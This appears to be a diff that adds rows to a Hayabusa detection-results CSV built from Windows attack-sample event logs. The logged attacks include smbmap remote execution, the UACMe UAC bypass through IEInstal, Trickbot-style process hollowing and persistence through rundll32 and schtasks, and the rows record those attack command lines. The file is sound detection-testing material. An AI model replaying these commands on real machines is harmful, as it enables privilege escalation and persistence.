+2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:05.720 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\WqEVwJZYOe | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\Administrator | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x33a8a8 | PID: 2784 | PGUID: 747F3D96-75D1-5F8B-0000-001088C23300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:05.822 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\WqEVwJZYOe | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:06.755 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49676 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:06.755 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49676 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-20 20:50:54.810 +09:00,DESKTOP-NTSSLJD,1,high,,Process Created_Sysmon Alert,"technique_id=T1059.001,technique_name=PowerShell | Cmd: ""C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe"" 64 | Process: C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe | User: DESKTOP-NTSSLJD\den | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | LID: 0x17ed8c | PID: 8712 | PGUID: 23F38D93-CF1E-5F8E-C808-000000000C00 | Hash: SHA1=4DFA874CE545B22B3AAFF93BD143C6E463996698,MD5=661D7257C25198B973361117467616BE,SHA256=870691CFC9C98866B2AF2E7E48ED5FD5F1D14CFE0E3E9C630BC472FC0A013D0B,IMPHASH=F31CA5C7DD56008F53D4F3926CF37891",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:54.810 +09:00,DESKTOP-NTSSLJD,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:54.814 +09:00,DESKTOP-NTSSLJD,7,info,Evas,Suspicious Load of Advapi31.dll,,rules/sigma/image_load/image_load_susp_advapi32_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:55.102 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\system32\consent.exe | PID: 8264 | PGUID: 23F38D93-CF1E-5F8E-C908-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:55.388 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Program Files\Internet Explorer\IEInstal.exe | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:55.390 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates | Process: C:\Program Files\Internet Explorer\IEInstal.exe | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:55.392 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates | Process: C:\Program Files\Internet Explorer\IEInstal.exe | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:55.450 +09:00,DESKTOP-NTSSLJD,11,info,,File Created,Path: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Program Files\Internet Explorer\IEInstal.exe | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:55.450 +09:00,DESKTOP-NTSSLJD,11,high,Evas | PrivEsc,UAC Bypass Using IEInstal - File,,rules/sigma/file_event/sysmon_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:55.461 +09:00,DESKTOP-NTSSLJD,23,info,,Deleted File Archived,C:\Users\den\AppData\Local\Temp\dfcc1807-03a1-4ae1-ab29-5675b285edea\consent.exe.dat | Process: C:\Program Files\Internet Explorer\IEInstal.exe | User: DESKTOP-NTSSLJD\den | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00,rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:55.577 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\system32\consent.exe | PID: 3760 | PGUID: 23F38D93-CF1F-5F8E-CB08-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:56.004 +09:00,DESKTOP-NTSSLJD,23,info,,Deleted File Archived,C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Windows\system32\DllHost.exe | User: DESKTOP-NTSSLJD\den | PID: 9444 | PGUID: 23F38D93-CF1F-5F8E-CC08-000000000C00,rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:56.090 +09:00,DESKTOP-NTSSLJD,11,info,,File Created,Path: C:\Users\den\AppData\Local\Temp\[1]consent.exe | Process: C:\Windows\explorer.exe | PID: 8712 | PGUID: 23F38D93-CF1E-5F8E-C808-000000000C00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:56.218 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\system32\consent.exe | PID: 112 | PGUID: 23F38D93-CF20-5F8E-CD08-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,,Process Created_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Cmd: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | User: DESKTOP-NTSSLJD\den | Parent Cmd: ""C:\Program Files\Internet Explorer\IEInstal.exe"" -Embedding | LID: 0x17eca2 | PID: 6896 | PGUID: 23F38D93-CF20-5F8E-CE08-000000000C00 | Hash: SHA1=6298449EB38C20ABFE79C32346258BF4951C1E53,MD5=98F48037163A97285E72A2107F0336CA,SHA256=B26D892448D336EBFAB26F033457D1A2A94E3CD8FBBDA5AE0DBB09E16BE4C84E,IMPHASH=DEA061EF56E13C6D0B065E71A879D9B6",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,Evas | PrivEsc,UAC Bypass Using IEInstal - Process,,rules/sigma/process_creation/proc_creation_win_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:56.517 +09:00,DESKTOP-NTSSLJD,7,info,Evas,Suspicious Load of Advapi31.dll,,rules/sigma/image_load/image_load_susp_advapi32_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:56.531 +09:00,DESKTOP-NTSSLJD,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1073,technique_name=DLL Side-Loading | Image: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Company: Integrity Investment LLC | Signed: false | Signature: Unavailable | PID: 6896 | PGUID: 23F38D93-CF20-5F8E-CE08-000000000C00 | Hash: SHA1=6298449EB38C20ABFE79C32346258BF4951C1E53,MD5=98F48037163A97285E72A2107F0336CA,SHA256=B26D892448D336EBFAB26F033457D1A2A94E3CD8FBBDA5AE0DBB09E16BE4C84E,IMPHASH=DEA061EF56E13C6D0B065E71A879D9B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:56.569 +09:00,DESKTOP-NTSSLJD,1,high,,Process Created_Sysmon Alert,"technique_id=T1059.003,technique_name=Windows Command Shell | Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: DESKTOP-NTSSLJD\den | Parent Cmd: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | LID: 0x17eca2 | PID: 9620 | PGUID: 23F38D93-CF20-5F8E-D008-000000000C00 | Hash: SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:56.569 +09:00,DESKTOP-NTSSLJD,10,high,,Process Access_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Src Process: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 6896 | Src PGUID: 23F38D93-CF20-5F8E-CE08-000000000C00 | Tgt PID: 9620 | Tgt PGUID: 23F38D93-CF20-5F8E-D008-000000000C00",rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:56.590 +09:00,DESKTOP-NTSSLJD,5,info,,Process Terminated,Process: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | PID: 6896 | PGUID: 23F38D93-CF20-5F8E-CE08-000000000C00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:56.731 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\system32\consent.exe | PID: 7716 | PGUID: 23F38D93-CF20-5F8E-CF08-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:56.999 +09:00,DESKTOP-NTSSLJD,23,info,,Deleted File Archived,C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Windows\system32\DllHost.exe | User: DESKTOP-NTSSLJD\den | PID: 9444 | PGUID: 23F38D93-CF1F-5F8E-CC08-000000000C00,rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:57.031 +09:00,DESKTOP-NTSSLJD,5,info,,Process Terminated,Process: C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe | PID: 8712 | PGUID: 23F38D93-CF1E-5F8E-C808-000000000C00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:51:01.476 +09:00,DESKTOP-NTSSLJD,22,info,,DNS Query,Query: wpad | Result: - | Process: C:\Windows\System32\svchost.exe | PID: 2428 | PGUID: 23F38D93-ABAC-5F8E-3900-000000000C00,rules/hayabusa/sysmon/events/22_DNS-Query.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\wermgr.exe | Process: C:\Windows\System32\wermgr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32.exe c:\temp\winfire.dll,DllRegisterServer | LID: 0x910e0 | PID: 5600 | PGUID: 747F3D96-659E-5F8F-0000-001064E03300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx
+2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,critical,Exec,Trickbot Malware Activity,,rules/sigma/process_creation/proc_creation_win_malware_trickbot_wermgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx
+2020-10-21 07:33:02.064 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\SysWOW64\rundll32.exe | Tgt Process: C:\Windows\system32\wermgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2372 | Src PGUID: 747F3D96-659B-5F8F-0000-001026C33300 | Tgt PID: 5600 | Tgt PGUID: 747F3D96-659E-5F8F-0000-001064E03300,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx
+2020-10-21 07:33:02.064 +09:00,MSEDGEWIN10,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx
+2020-10-21 07:35:26.755 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: ? | LID: 0x3e4 | PID: 6748 | PGUID: 747F3D96-662E-5F8F-0000-001023353800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx
+2020-10-24 06:55:59.769 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{2015B2D1-1706-42F6-8C0E-8BEECB408D48}-86.0.4240.111_86.0.4240.75_chrome_updater.exe | URL: http://r2---sn-5hnekn7z.gvt1.com/edgedl/release2/chrome/E4_ltUMmNI-KvJYPRyaXng_86.0.4240.111/86.0.4240.111_86.0.4240.75_chrome_updater.exe?cms_redirect=yes&mh=3q&mip=213.127.65.23&mm=28&mn=sn-5hnekn7z&ms=nvh&mt=1603490058&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-24 06:57:29.217 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: ? | LID: 0x3e4 | PID: 8796 | PGUID: 747F3D96-51C9-5F93-0000-001010175B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:57:34.745 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\tmp1375\__tmp_rar_sfx_access_check_2914968 | Process: c:\Users\Public\test.tmp | PID: 7624 | PGUID: 747F3D96-51CD-5F93-0000-001073735B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:57:34.767 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\tmp1375\d948 | Process: c:\Users\Public\test.tmp | PID: 7624 | PGUID: 747F3D96-51CD-5F93-0000-001073735B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:57:36.014 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948 | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: c:\Users\Public\test.tmp | LID: 0x8a585 | PID: 3396 | PGUID: 747F3D96-51D0-5F93-0000-001036A15B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:57:36.332 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp | Process: C:\Windows\SysWOW64\rundll32.exe | PID: 3396 | PGUID: 747F3D96-51D0-5F93-0000-001036A15B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:57:36.399 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers | Process: C:\Windows\SysWOW64\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948 | LID: 0x8a585 | PID: 5572 | PGUID: 747F3D96-51D0-5F93-0000-0010B2B35B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers | Process: C:\Windows\SysWOW64\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers | LID: 0x8a585 | PID: 8572 | PGUID: 747F3D96-51D0-5F93-0000-001079C05B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious Add Scheduled Task From User AppData Temp,,rules/sigma/process_creation/proc_creation_win_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,high,Exec,Suspicius Schtasks From Env Var Folder,,rules/sigma/process_creation/win_pc_susp_schtasks_env_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious Add Scheduled Command Pattern,,rules/sigma/process_creation/proc_creation_win_susp_schtasks_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:58:07.601 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\svchost.exe | Tgt Process: C:\Windows\Explorer.EXE | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 3420 | Src PGUID: 747F3D96-4790-5F93-0000-001054282200 | Tgt PID: 5864 | Tgt PGUID: 747F3D96-4694-5F93-0000-001092F70900,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x8a619 | PID: 7552 | PGUID: 747F3D96-51F9-5F93-0000-001003125E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 | LID: 0x8a619 | PID: 9116 | PGUID: 747F3D96-51F9-5F93-0000-0010551E5E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Call by Ordinal,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
